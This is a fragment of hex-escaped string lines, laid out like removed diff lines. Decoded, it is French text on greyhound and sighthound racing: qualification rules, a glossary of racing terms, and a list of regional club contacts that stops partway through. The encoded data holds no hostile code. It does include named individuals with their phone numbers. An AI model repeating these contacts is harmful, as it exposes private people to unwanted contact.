-"\x73\x20\x31\x20\x43\x41\x43\x53\x20\x65\x74\x20\x31\x20\x52\x43"
-"\x41\x43\x53\x29\x20\x65\x74\x20\x65\x6e\x20\x63\x6f\x75\x72\x73"
-"\x65\x20\x28\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x32\x20\x65\x78"
-"\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20\x65\x74\x20\x75\x6e\x20\x63"
-"\x68\x72\x6f\x6e\x6f\x20\xe9\x6c\x65\x63\x74\x72\x69\x71\x75\x65"
-"\x29\x20\x73\x65\x6c\x6f\x6e\x20\x62\x61\x72\xe8\x6d\x65\x20\x63"
-"\x6f\x6d\x70\x65\x6e\x73\x61\x74\x65\x75\x72\x2e\x0d\x45\x78\x20"
-"\x3a\x20\x32\x20\x65\x78\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20\x65"
-"\x74\x20\x70\x61\x72\x74\x69\x63\x69\x70\x61\x74\x69\x6f\x6e\x20"
-"\x47\x72\x61\x6e\x64\x20\x50\x72\x69\x78\x20\x53\x43\x43\x20\x73"
-"\x75\x66\x66\x69\x73\x65\x6e\x74\x20\x65\x6e\x20\x63\x6f\x75\x72"
-"\x73\x65\x20\xe0\x20\x75\x6e\x20\x74\x69\x74\x75\x6c\x61\x69\x72"
-"\x65\x20\x64\x65\x20\x32\x20\x43\x41\x43\x49\x42\x2e\x0d\x0d\x50"
-"\x6f\x75\x72\x73\x75\x69\x74\x65\x3a\x0d\x09\x4c\x65\x73\x20\x6c"
-"\xe9\x76\x72\x69\x65\x72\x73\x20\x64\x6f\x69\x76\x65\x6e\x74\x20"
-"\x61\x76\x6f\x69\x72\x20\x6f\x62\x74\x65\x6e\x75\x20\x6c\x65\x73"
-"\x20\x6d\xea\x6d\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73"
-"\x20\x65\x6e\x20\x42\x65\x61\x75\x74\xe9\x20\x71\x75\x65\x20\x63"
-"\x69\x2d\x64\x65\x73\x73\x75\x73\x2c\x20\x69\x6c\x73\x20\x64\x65"
-"\x76\x72\x6f\x6e\x74\x20\x65\x6e\x20\x6f\x75\x74\x72\x65\x20\x61"
-"\x76\x6f\x69\x72\x20\x61\x75\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20"
-"\x64\x65\x75\x78\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x73\x20"
-"\x65\x6e\x20\x50\x56\x4c\x20\x61\x69\x6e\x73\x69\x20\x71\x75\x27"
-"\x75\x6e\x20\x63\x68\x72\x6f\x6e\x6f\x6d\xe9\x74\x72\x61\x67\x65"
-"\x20\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x71\x75\x27\x69\x6c"
-"\x73\x20\x6f\x6e\x74\x20\x65\x66\x66\x65\x63\x74\x75\xe9\x20\x75"
-"\x6e\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x41\x20\x73\x75\x72"
-"\x20\x61\x75\x20\x6d\x6f\x69\x6e\x73\x20\x37\x35\x20\x6d\xe8\x74"
-"\x72\x65\x73\x2e\x0d\x0d\x4d\x69\x78\x74\x65\x3a\x0d\x09\x4c\x65"
-"\x20\x74\x69\x74\x72\x65\x20\x70\x6f\x75\x72\x72\x61\x20\xea\x74"
-"\x72\x65\x20\x6f\x62\x74\x65\x6e\x75\x20\x61\x76\x65\x63\x20\x64"
-"\x65\x73\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e\x20"
-"\x45\x4e\x43\x20\x65\x74\x20\x65\x6e\x20\x50\x56\x4c\x2e\x0d\x0d"
-"\x09\x47\x72\x61\x6e\x64\x20\x50\x72\x69\x78\x20\x64\x65\x20\x6c"
-"\x61\x20\x53\x43\x43\x20\x3a\x20\x0d\x43\x6f\x75\x72\x73\x65\x20"
-"\x72\xe9\x73\x65\x72\x76\xe9\x65\x20\x61\x75\x78\x20\x6c\xe9\x76"
-"\x72\x69\x65\x72\x73\x20\x74\x69\x74\x75\x6c\x61\x69\x72\x65\x73"
-"\x20\x64\x65\x20\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e"
-"\x20\x65\x78\x70\x6f\x73\x69\x74\x69\x6f\x6e\x73\x20\x61\x76\x65"
-"\x63\x20\x61\x75\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x52\x43\x41"
-"\x43\x53\x20\x2b\x20\x75\x6e\x20\x65\x78\x63\x65\x6c\x6c\x65\x6e"
-"\x74\x2c\x20\x61\x69\x6e\x73\x69\x20\x71\x75\x92\x75\x6e\x20\x65"
-"\x78\x63\x65\x6c\x6c\x65\x6e\x74\x20\x6f\x75\x20\x64\x65\x75\x78"
-"\x20\x74\x72\xe8\x73\x20\x62\x6f\x6e\x20\x65\x6e\x20\x45\x4e\x43"
-"\x2e\x20\x4c\x61\x20\x76\x69\x63\x74\x6f\x69\x72\x65\x20\x65\x73"
-"\x74\x20\x70\x6f\x72\x74\xe9\x65\x20\x61\x75\x20\x70\x65\x64\x69"
-"\x67\x72\x65\x65\x20\x28\x47\x50\x58\x29\x2e\x20\x0d\x0d\x09\x43"
-"\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x27\x45\x75\x72"
-"\x6f\x70\x65\x20\x65\x74\x20\x64\x75\x20\x4d\x6f\x6e\x64\x65\x20"
-"\x64\x65\x20\x63\x6f\x75\x72\x73\x65\x20\x3a\x0d\x4f\x72\x67\x61"
-"\x6e\x69\x73\x61\x74\x69\x6f\x6e\x20\x61\x6e\x6e\x75\x65\x6c\x6c"
-"\x65\x20\x64\x65\x20\x6c\x61\x20\x63\x6f\x6e\x66\x72\x6f\x6e\x74"
-"\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x6d\x65\x69\x6c\x6c\x65"
-"\x75\x72\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73\x20\x73\xe9\x6c"
-"\x65\x63\x74\x69\x6f\x6e\x6e\xe9\x73\x20\x70\x61\x72\x20\x63\x68"
-"\x61\x71\x75\x65\x20\x70\x61\x79\x73\x20\x6d\x65\x6d\x62\x72\x65"
-"\x2c\x20\x70\x61\x72\x20\x72\x61\x63\x65\x20\x65\x74\x20\x70\x61"
-"\x72\x20\x73\x65\x78\x65\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69"
-"\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x46\x72\x61\x6e\x63\x65\x20"
-"\x64\x65\x20\x50\x56\x4c\x20\x3a\x0d\x45\x70\x72\x65\x75\x76\x65"
-"\x20\x72\xe9\x63\x6f\x6d\x70\x65\x6e\x73\x61\x6e\x74\x20\x6c\x65"
-"\x20\x6d\x65\x69\x6c\x6c\x65\x75\x72\x20\x6c\xe9\x76\x72\x69\x65"
-"\x72\x20\xe4\x6e\x20\x45\x50\x56\x4c\x2c\x20\x63\x68\x61\x71\x75"
-"\x65\x20\x61\x6e\x6e\xe9\x65\x2e\x0d\x0d\x09\x42\x72\x61\x73\x73"
-"\x6f\x6b\x20\x3a\x20\x0d\x50\x6c\x6f\x6e\x67\x65\x6f\x6e\x20\x64"
-"\x75\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x73\x75\x72\x20\x6c\x65"
-"\x20\x6c\x65\x75\x72\x72\x65\x20\xe0\x20\x6c\x27\x61\x72\x72\x69"
-"\x76\xe9\x65\x2c\x20\x72\x61\x70\x70\x65\x6c\x61\x6e\x74\x20\x6c"
-"\x61\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20\x65\x6d\x70\x6c"
-"\x6f\x79\xe9\x65\x20\x70\x6f\x75\x72\x20\x74\x75\x65\x72\x20\x75"
-"\x6e\x20\x61\x70\x70\xe2\x74\x20\x76\x69\x76\x61\x6e\x74\x2e\x0d"
-"\x0d\x09\x41\x74\x74\x61\x71\x75\x65\x20\x3a\x0d\x4d\x6f\x75\x76"
-"\x65\x6d\x65\x6e\x74\x20\x64\x75\x20\x6c\xe9\x76\x72\x69\x65\x72"
-"\x20\x76\x65\x72\x73\x20\x75\x6e\x20\x63\x6f\x6e\x63\x75\x72\x72"
-"\x65\x6e\x74\x2c\x20\x61\x75\x20\x63\x6f\x75\x72\x73\x20\x64\x75"
-"\x71\x75\x65\x6c\x20\x6c\x65\x20\x66\x61\x75\x74\x69\x66\x20\x71"
-"\x75\x69\x74\x74\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20"
-"\x64\x65\x73\x20\x79\x65\x75\x78\x2e\x20\x4c\x27\x61\x74\x74\x61"
-"\x71\x75\x65\x20\x6e\x65\x20\x73\x69\x67\x6e\x69\x66\x69\x65\x20"
-"\x6e\x75\x6c\x6c\x65\x6d\x65\x6e\x74\x20\x75\x6e\x65\x20\x76\x6f"
-"\x6c\x6f\x6e\x74\xe9\x20\x61\x67\x72\x65\x73\x73\x69\x76\x65\x2c"
-"\x20\x73\x6f\x75\x76\x65\x6e\x74\x20\x64\x75\x20\x6a\x65\x75\x2e"
-"\x0d\x0d\x09\x42\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x20\x3a\x0d"
-"\x4d\x6f\x75\x76\x65\x6d\x65\x6e\x74\x20\x64\x75\x20\x6c\xe9\x76"
-"\x72\x69\x65\x72\x20\x71\x75\x69\x20\x73\x61\x6e\x73\x20\x71\x75"
-"\x69\x74\x74\x65\x72\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20"
-"\x64\x65\x73\x20\x79\x65\x75\x78\x20\x65\x73\x74\x20\x64\xe9\x70"
-"\x6f\x72\x74\xe9\x20\x6f\x75\x20\x73\x65\x20\x66\x61\x69\x74\x20"
-"\x64\x65\x20\x6c\x61\x20\x70\x6c\x61\x63\x65\x20\xe0\x20\x63\x6f"
-"\x75\x70\x73\x20\x64\x27\xe9\x70\x61\x75\x6c\x65\x20\x6f\x75\x20"
-"\x64\x65\x20\x68\x61\x6e\x63\x68\x65\x2e\x20\x4c\x61\x20\x62\x6f"
-"\x75\x73\x63\x75\x6c\x61\x64\x65\x20\x6e\x27\x65\x73\x74\x20\x70"
-"\x61\x73\x20\x75\x6e\x20\x61\x63\x74\x65\x20\x66\x61\x75\x74\x69"
-"\x66\x2c\x20\x6d\xea\x6d\x65\x20\x73\x69\x20\x65\x6c\x6c\x65\x20"
-"\x70\x72\x6f\x76\x6f\x71\x75\x65\x20\x6c\x61\x20\x63\x68\x75\x74"
-"\x65\x20\x64\x75\x20\x62\x6f\x75\x73\x63\x75\x6c\xe9\x2e\x0d\x0d"
-"\x09\x4f\x75\x76\x72\x65\x75\x72\x20\x3a\x0d\x4c\xe9\x76\x72\x69"
-"\x65\x72\x20\x6e\x6f\x6e\x20\x65\x6e\x67\x61\x67\xe9\x20\x71\x75"
-"\x69\x20\x6f\x75\x76\x72\x65\x20\x6c\x61\x20\x72\xe9\x75\x6e\x69"
-"\x6f\x6e\x20\x70\x6f\x75\x72\x20\x76\xe9\x72\x69\x66\x69\x63\x61"
-"\x74\x69\x6f\x6e\x20\x64\x75\x20\x6d\x61\x74\xe9\x72\x69\x65\x6c"
-"\x2e\x0d\x0d\x09\x4f\x62\x73\x65\x72\x76\x61\x74\x65\x75\x72\x73"
-"\x20\x64\x65\x20\x76\x69\x72\x61\x67\x65\x20\x3a\x0d\x41\x6e\x63"
-"\x69\x65\x6e\x6e\x65\x6d\x65\x6e\x74\x20\x43\x6f\x6d\x6d\x69\x73"
-"\x73\x61\x69\x72\x65\x2e\x0d\x50\x65\x72\x73\x6f\x6e\x6e\x65\x20"
-"\x61\x67\x72\xe9\xe9\x65\x20\x70\x61\x72\x20\x6c\x61\x20\x43\x2e"
-"\x4c\x2e\x20\x70\x61\x72\x6d\x69\x20\x64\x65\x73\x20\x70\x72\x6f"
-"\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x73\x20\x65\x78\x70\xe9\x72"
-"\x69\x6d\x65\x6e\x74\xe9\x73\x20\x65\x74\x20\x71\x75\x69\x20\x73"
-"\x65\x20\x70\x6c\x61\x63\x65\x20\xe0\x20\x63\x68\x61\x71\x75\x65"
-"\x20\x76\x69\x72\x61\x67\x65\x73\x20\x70\x6f\x75\x72\x20\x64\x6f"
-"\x6e\x6e\x65\x72\x20\x73\x6f\x6e\x20\x61\x76\x69\x73\x20\x73\x75"
-"\x72\x20\x6c\x65\x20\x63\x6f\x6d\x70\x6f\x72\x74\x65\x6d\x65\x6e"
-"\x74\x20\x64\x75\x20\x6c\xe9\x76\x72\x69\x65\x72\x2e\x20\x4c\x65"
-"\x20\x6a\x75\x67\x65\x20\x65\x73\x74\x20\x6c\x69\x62\x72\x65\x20"
-"\x64\x65\x20\x73\x75\x69\x76\x72\x65\x20\x6f\x75\x20\x6e\x6f\x6e"
-"\x20\x73\x6f\x6e\x20\x61\x76\x69\x73\x20\x28\x63\x6f\x6d\x6d\x65"
-"\x20\x6c\x65\x20\x6a\x75\x67\x65\x20\x64\x65\x20\x74\x6f\x75\x63"
-"\x68\x65\x20\x65\x6e\x20\x66\x6f\x6f\x74\x62\x61\x6c\x6c\x20\x6f"
-"\x75\x20\x65\x6e\x20\x72\x75\x67\x62\x79\x29\x2e\x0d\x51\x75\x61"
-"\x6e\x64\x20\x69\x6c\x20\x61\x20\x76\x75\x20\x75\x6e\x65\x20\x66"
-"\x61\x75\x74\x65\x2c\x20\x69\x6c\x20\x6c\xe8\x76\x65\x20\x6c\x65"
-"\x20\x62\x72\x61\x73\x20\x6f\x75\x20\x75\x6e\x20\x66\x61\x6e\x69"
-"\x6f\x6e\x2e\x20\x0d\x0d\x09\x50\x61\x64\x64\x6f\x63\x6b\x3a\x20"
-"\x0d\x5a\x6f\x6e\x65\x20\x64\xe9\x6c\x69\x6d\x69\x74\xe9\x65\x20"
-"\x70\x61\x72\x20\x64\x65\x73\x20\x63\x6f\x72\x64\x61\x67\x65\x73"
-"\x20\x57\xf9\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73"
-"\x20\x73\x6f\x6e\x74\x20\x73\x6f\x75\x6d\x69\x73\x20\x61\x75\x78"
-"\x20\x63\x6f\x6e\x74\x72\xf4\x6c\x65\x73\x20\x74\x65\x63\x68\x6e"
-"\x69\x71\x75\x65\x73\x20\x65\x74\x20\x61\x74\x74\x65\x6e\x64\x65"
-"\x6e\x74\x20\x6c\x27\x6f\x72\x64\x72\x65\x20\x64\x27\x61\x6c\x6c"
-"\x65\x72\x20\x61\x75\x78\x20\x62\x6f\x69\x74\x65\x73\x20\x64\x65"
-"\x20\x64\xe9\x70\x61\x72\x74\x2e\x0d\x0d\x09\x53\x74\x61\x72\x74"
-"\x65\x72\x3a\x0d\x50\x65\x72\x73\x6f\x6e\x6e\x65\x20\x71\x75\x69"
-"\x20\x64\x6f\x6e\x6e\x65\x20\x6c\x65\x20\x64\xe9\x70\x61\x72\x74"
-"\x20\x65\x6e\x20\x6f\x75\x76\x72\x61\x6e\x74\x20\x6c\x65\x73\x20"
-"\x62\x6f\x69\x74\x65\x2e\x0d\x0d\x09\x4c\x65\x75\x72\x72\x69\x73"
-"\x74\x65\x3a\x0d\x52\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20"
-"\x64\x65\x20\x6c\x61\x20\x63\x6f\x6e\x64\x75\x69\x74\x65\x20\x64"
-"\x75\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x6e\x20\x52\x61\x63\x69"
-"\x6e\x67\x2e\x0d\x0d\x09\x43\x6f\x6e\x64\x75\x63\x74\x65\x75\x72"
-"\x20\x74\x65\x63\x68\x6e\x69\x71\x75\x65\x20\x3a\x0d\x52\x65\x73"
-"\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20\x64\x65\x20\x6c\x61\x20\x63"
-"\x6f\x6e\x64\x75\x69\x74\x65\x20\x64\x75\x20\x6c\x65\x75\x72\x72"
-"\x65\x20\x65\x6e\x20\x45\x2e\x50\x2e\x56\x2e\x4c\x2e\x20\x0d\x53"
-"\x6f\x6e\x20\x72\xf4\x6c\x65\x20\x65\x73\x74\x20\x63\x6f\x6e\x73"
-"\x69\x64\xe9\x72\x61\x62\x6c\x65\x20\x65\x74\x20\x6c\x65\x73\x20"
-"\x63\x6f\x6e\x64\x69\x74\x69\x6f\x6e\x73\x20\x64\x65\x20\x6e\x6f"
-"\x6d\x69\x6e\x61\x74\x69\x6f\x6e\x20\x64\x65\x20\x70\x6c\x75\x73"
-"\x20\x65\x6e\x20\x70\x6c\x75\x73\x20\x73\xe9\x76\xe8\x72\x65\x73"
-"\x2e\x0d\x0d\x09\x41\x6d\x69\x63\x61\x6c\x65\x3a\x0d\x45\x70\x72"
-"\x65\x75\x76\x65\x20\x6e\x6f\x6e\x2d\x6f\x66\x66\x69\x63\x69\x65"
-"\x6c\x6c\x65\x20\x6f\x72\x67\x61\x6e\x69\x73\xe9\x65\x20\x70\x61"
-"\x72\x20\x75\x6e\x20\x63\x6c\x75\x62\x20\x61\x67\x72\xe9\xe9\x20"
-"\x73\x65\x6c\x6f\x6e\x20\x73\x6f\x6e\x20\x70\x72\x6f\x70\x72\x65"
-"\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x20\x65\x74\x20\x70\x6f"
-"\x75\x76\x61\x6e\x74\x20\xea\x74\x72\x65\x20\x64\x6f\x74\xe9\x65"
-"\xa2\x64\x65\x20\x70\x72\x69\x78\x20\x65\x6e\x20\x65\x73\x70\xe8"
-"\x63\x65\x73\x2e\x20\x4c\x61\x20\x73\x65\x75\x6c\x65\x20\x63\x6f"
-"\x6e\x74\x72\x61\x69\x6e\x74\x65\x20\x65\x73\x74\x20\x64\x27\x69"
-"\x6e\x66\x6f\x72\x6d\x65\x72\x20\x6c\x61\x20\x43\x2e\x4c\x2e\x20"
-"\x65\x74\x20\x6c\x61\x20\x53\x6f\x63\x69\xe9\x74\xe9\x20\x43\x61"
-"\x6e\x69\x6e\x65\x20\x6c\x6f\x63\x61\x6c\x65\x2e\x20\x4f\x6e\x20"
-"\x6e\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x20\x6f\x72\x67\x61"
-"\x6e\x69\x73\x65\x72\x20\x64\x27\x61\x6d\x69\x63\x61\x6c\x65\x20"
-"\x6c\x65\x20\x6a\x6f\x75\x72\x20\x64\x27\x75\x6e\x65\x20\xe9\x70"
-"\x72\x65\x75\x76\x65\x20\x70\x72\x6f\x74\xe9\x67\xe9\x65\x20\x6f"
-"\x75\x20\xff\x27\x69\x6c\x20\x79\x20\x61\x20\x20\x72\x69\x73\x71"
-"\x75\x65\x20\x64\x65\x20\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x63"
-"\x65\x72\x20\x75\x6e\x65\x20\xe9\x70\x72\x65\x75\x76\x65\x20\x6f"
-"\x66\x66\x69\x63\x69\x65\x6c\x6c\x65\x2e\x0d\x0d\x09\x54\x72\x6f"
-"\x70\x68\xe9\x65\x2c\x20\x44\x65\x72\x62\x79\x2e\x2e\x2e\x0d\x41"
-"\x70\x70\x65\x6c\x6c\x61\x74\x69\x6f\x6e\x73\x20\x70\x72\x6f\x70"
-"\x72\x65\x73\x20\xe0\x20\x75\x6e\x65\x20\x61\x6d\x69\x63\x61\x6c"
-"\x65\x20\x64\x65\x20\x43\x6c\x75\x62\x20\x6f\x75\x20\x64\x65\x20"
-"\x70\x72\x6f\x70\x72\x69\xe9\x74\x61\x69\x72\x65\x73\x20\x70\x6f"
-"\x75\x72\x20\x6d\x69\x65\x75\x78\x20\x72\x65\x74\x65\x6e\x69\x72"
-"\x20\x6c\x27\x61\x74\x74\x65\x6e\x74\x69\x6f\x6e\x2e\x0d\x0d\x09"
-"\x53\x75\x73\x70\x65\x6e\x73\x69\x6f\x6e\x3a\x0d\x46\x61\x75\x74"
-"\x65\x20\x6c\xe9\x67\xe8\x72\x65\x20\x70\x61\x72\x20\x6d\x61\x6e"
-"\x71\x75\x65\x20\x64\x27\x61\x72\x64\x65\x75\x72\x2e\x0d\x0d\x09"
-"\x44\x69\x73\x71\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x69\x6f\x6e"
-"\x3a\x0d\x46\x61\x75\x74\x65\x20\x67\x72\x61\x76\x65\x20\x6e\x75"
-"\x69\x73\x61\x6e\x74\x20\xe0\x20\x61\x75\x74\x72\x75\x69\x20\x65"
-"\x74\x20\x69\x6e\x74\x65\x72\x64\x69\x74\x65\x20\x70\x61\x72\x20"
-"\x6c\x65\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74\x2e\x0d\x0d\x09"
-"\x43\x68\x61\x75\x76\x69\x6e\x69\x73\x6d\x65\x3a\x0d\x56\x6f\x74"
-"\x72\x65\x20\x6c\xe9\x76\x72\x69\x65\x72\x20\x6e\x65\x20\x73\x65"
-"\x72\x61\x20\x70\x61\x73\x20\x66\x6f\x72\x63\x65\x6d\x65\x6e\x74"
-"\x20\x6c\x65\x20\x70\x6c\x75\x73\x20\x72\x61\x70\x69\x64\x65\x2c"
-"\x20\x6d\x61\x69\x73\x20\x70\x6f\x75\x72\x20\x76\x6f\x75\x73\x2c"
-"\x20\x69\x6c\x20\x73\x65\x72\x61\x20\x6c\x65\x20\x70\x6c\x75\x73"
-"\x20\x69\x6e\x74\x65\x6c\x6c\x69\x67\x65\x6e\x74\x2c\x20\x6c\x65"
-"\x20\x70\x6c\x75\x73\x20\x62\x65\x61\x75\x2c\x20\x6c\x65\x20\x70"
-"\x6c\x75\x73\x20\x67\x65\x6e\x74\x69\x6c\x2e\x20\x4e\x27\x61\x64"
-"\x6d\x65\x74\x74\x65\x7a\x20\x70\x61\x73\x20\x71\x75\x27\x6f\x6e"
-"\x20\x6c\x65\x20\x64\xe9\x6e\x69\x67\x72\x65\x2c\x20\x70\x61\x73"
-"\x20\x70\x6c\x75\x73\x20\x71\x75\x65\x20\x73\x6f\x6e\x20\xe9\x6c"
-"\x65\x76\x65\x75\x72\x20\x6f\x75\x20\x73\x6f\x6e\x20\x63\x6c\x75"
-"\x62\x2e\x20\x4e\x65\x20\x6c\x65\x20\x66\x61\x69\x74\x65\x73\x20"
-"\x70\x61\x73\x20\x70\x6f\x75\x72\x20\x6c\x65\x73\x20\x61\x75\x74"
-"\x72\x65\x73\x2e\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d"
-"\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d"
-"\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x41\x20\x71\x75\x69"
-"\x20\x76\x6f\x75\x73\x20\x61\x64\x72\x65\x73\x73\x65\x72\x20\x3f"
-"\x0d\x50\x6f\x75\x72\x20\x74\x6f\x75\x74\x20\x72\x65\x6e\x73\x65"
-"\x69\x67\x6e\x65\x6d\x65\x6e\x74\x20\x74\x65\x63\x68\x6e\x69\x71"
-"\x75\x65\x20\x6f\x75\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61"
-"\x74\x69\x66\x20\x3a\x09\x41\x20\x76\x6f\x74\x72\x65\x20\x63\x6c"
-"\x75\x62\x20\x64\x65\x20\x74\x72\x61\x76\x61\x69\x6c\x20\x61\x67"
-"\x72\xe9\xe9\x20\x3a\x0d\x0d\x36\x38\x07\x41\x4c\x53\x41\x43\x45"
-"\x07\x4d\x6d\x65\x20\x53\x63\x68\x65\x72\x72\x65\x72\x07\x30\x33"
-"\x2e\x38\x39\x2e\x34\x30\x2e\x35\x39\x2e\x31\x30\x07\x42\x65\x74"
-"\x74\x65\x6e\x64\x6f\x72\x66\x07\x50\x56\x4c\x07\x07\x37\x36\x07"
-"\x41\x43\x43\x4c\x07\x4d\x2e\x20\x47\x61\x72\x72\x61\x75\x6c\x74"
-"\x07\x30\x32\x2e\x33\x35\x2e\x34\x34\x2e\x38\x31\x2e\x36\x33\x07"
-"\x4d\x61\x6e\x6e\x65\x76\x69\x6c\x65\x74\x74\x65\x07\x45\x4e\x43"
-"\x07\x07\x36\x36\x07\x41\x43\x4c\x53\x07\x4d\x6d\x65\x20\x4d\x61"
-"\x73\x61\x6e\x61\x07\x30\x34\x2e\x36\x38\x2e\x39\x32\x2e\x37\x32"
-"\x2e\x34\x30\x07\x50\x65\x72\x70\x69\x67\x6e\x61\x6e\x07\x50\x56"
-"\x4c\x20\x2b\x20\x45\x4e\x43\x07\x07\x31\x32\x07\x41\x43\x4c\x41"
-"\x43\x54\x41\x07\x4d\x2e\x20\x47\x61\x79\x72\x61\x72\x64\x07\x30"
-"\x35\x2e\x36\x35\x2e\x36\x33\x2e\x33\x36\x2e\x33\x32\x07\x43\x72"
-"\x61\x6e\x73\x61\x63\x20\x6c\x65\x73\x20\x54\x65\x72\x6d\x65\x73"
-"\x07\x45\x4e\x43\x07\x07\x39\x34\x07\x41\x53\x4c\x4c\x07\x4d\x6d"
-"\x65\x20\x41\x6e\x73\x61\x6c\x64\x69\x20\x4a\x61\x63\x71\x75\x65"
-"\x74\x07\x30\x31\x2e\x36\x39\x2e\x33\x31\x2e\x30\x35\x2e\x36\x39"
-"\x07\x4e\x65\x75\x69\x6c\x6c\x79\x20\x73\x75\x72\x20\x4d\x61\x72"
-"\x6e\x65\x07\x45\x6e\x74\x72\x61\x69\x6e\x65\x6d\x65\x6e\x74\x73"
-"\x07\x07\x39\x30\x07\x43\x43\x43\x07\x4d\x6d\x65\x20\x4c\x69\x6e"
-"\x64\x65\x6b\x65\x72\x07\x30\x33\x2e\x38\x34\x2e\x32\x39\x2e\x30"
-"\x31\x2e\x37\x31\x07\x42\x65\x6c\x66\x6f\x72\x74\x07\x37\x56\x4c"
-"\x07\x07\x34\x34\x07\x43\x43\x43\x41\x07\x4d\x2e\x20\x4d\x61\x67"
-"\x72\xe9\x07\x30\x32\x2e\x34\x30\x2e\x38\x38\x2e\x38\x39\x2e\x38"
-"\x38\x07\x48\x65\x72\x62\x69\x67\x6e\x61\x63\x07\x50\x56\x4c\x07"
-"\x07\x37\x31\x07\x43\x43\x4c\x42\x07\x4d\x2e\x20\x42\x6f\x75\x72"
-"\x61\x73\x73\x65\x74\x07\x30\x34\x2e\x37\x34\x2e\x35\x35\x2e\x31"
-"\x33\x2e\x30\x34\x07\x4d\xe2\x63\x6f\x6e\x07\x50\x56\x4c\x07\x07"
-"\x32\x36\x07\x43\x43\x4c\x56\x07\x4d\x6c\x6c\x65\x20\x4c\x6f\x6d"
-"\x62\x61\x72\x64\x07\x30\x34\x2e\x37\x35\x2e\x38\x33\x2e\x37\x32"
-"\x2e\x38\x32\x07\x56\x61\x6c\x65\x6e\x63\x65\x07\x45\x6e\x74\x72"
-"\x61\x69\x6e\x74\x73\x20\x50\x56\x4c\x07\x07\x31\x36\x07\x43\x45"
-"\x19\x43\x07\x4d\x6d\x65\x20\x4c\x61\x6c\x65\x6d\x65\x6e\x64\x07"
-"\x30\x35\x2e\x34\x35\x2e\x36\x37\x2e\x39\x35\x2e\x38\x31\x07\x4d"
-"\x61\x6e\x73\x6c\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x32"
-"\x39\x07\x43\x4c\x41\x4d\x07\x4d\x2e\x20\x4c\x65\x67\x75\x65\x73"
-"\x67\x75\x65\x07\x30\x32\x2e\x39\x38\x2e\x37\x32\x2e\x34\x34\x2e"
-"\x34\x32\x07\x4d\x6f\x72\x6c\x61\x69\x78\x07\x50\x56\x4c\x07\x07"
-"\x33\x33\x07\x43\x4c\x43\x07\x4d\x6c\x6c\x65\x20\x4d\x6f\x6e\x69"
-"\x6f\x74\x07\x30\x36\x2e\x30\x37\x2e\x33\x37\x2e\x37\x33\x2e\x31"
-"\x39\x07\x53\x74\x20\x44\x65\x6e\x69\x73\x20\x64\x65\x20\x50\x69"
-"\x6c\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x36\x32\x07\x43"
-"\x4c\x43\x41\x07\x4d\x2e\x20\x42\x65\x6e\x6f\x69\x74\x07\x30\x33"
-"\x2e\x32\x31\x2e\x31\x32\x2e\x37\x30\x2e\x33\x30\x07\x41\x69\x72"
-"\x20\x73\x2f\x4c\x79\x73\x07\x45\x4e\x43\x07\x07\x37\x38\x07\x43"
-"\x4c\x43\x49\x46\x07\x4d\x2e\x20\x4c\x65\x66\xe8\x76\x72\x65\x07"
-"\x30\x32\x2e\x33\x32\x2e\x33\x38\x2e\x34\x36\x2e\x32\x33\x07\x4d"
-"\x65\x75\x6c\x61\x6e\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x34"
-"\x30\x07\x43\x55\x4c\x43\x4c\x07\x4d\x2e\x20\x4c\x75\x63\x61\x6e"
-"\x74\x6f\x6e\x69\x6f\x07\x30\x35\x2e\x36\x32\x2e\x34\x35\x2e\x30"
-"\x33\x2e\x35\x31\x07\x4d\x6f\x6e\x74\x20\x64\x65\x20\x4d\x61\x72"
-"\x73\x61\x6e\x07\x45\x4e\x43\x2b\x45\x6e\x74\x72\x2e\x50\x56\x4c"
-"\x07\x07\x37\x32\x07\x43\x4c\x43\x4d\x07\x4d\x2e\x20\x46\x65\x6c"
-"\x64\x65\x72\x07\x30\x36\x2e\x38\x32\x2e\x33\x39\x2e\x37\x32\x2e"
-"\x36\x35\x07\x50\x61\x72\x69\x67\x6e\xe9\x20\x6c\x27\x45\x76\xea"
-"\x71\x75\x65\x07\x45\x4e\x43\x2b\x50\x56\x4c\x07\x07\x33\x38\x07"
-"\x43\x4c\x44\x53\x07\x4d\x6d\x65\x20\x43\x61\x69\x6c\x6c\x61\x74"
